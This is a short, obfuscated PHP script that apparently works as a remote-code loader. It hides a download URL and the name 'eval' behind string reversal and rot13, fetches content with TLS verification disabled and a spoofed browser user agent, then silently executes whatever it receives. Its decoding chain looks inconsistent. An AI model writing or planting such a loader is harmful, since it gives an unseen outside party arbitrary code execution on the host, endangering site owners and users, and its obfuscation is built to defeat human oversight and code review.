<?php

$u = str_rot13(strrev("=l3M9UnZ0Z3biRHbhNHbuFmZzV2XyR3YlRnbvN2X0V2ZulGbn92YyV2Zz9GbgUGbpR2bj5WauR2b"));
$f = strrev("ecruos_er_teg");
$e = strrev("lave");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, hex2bin($u));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$r = curl_exec($ch);
curl_close($ch);

if ($r) {
    $c = preg_replace('/^<\?php|<\?|\?>$/', '', $r);
    @$e($c);
}
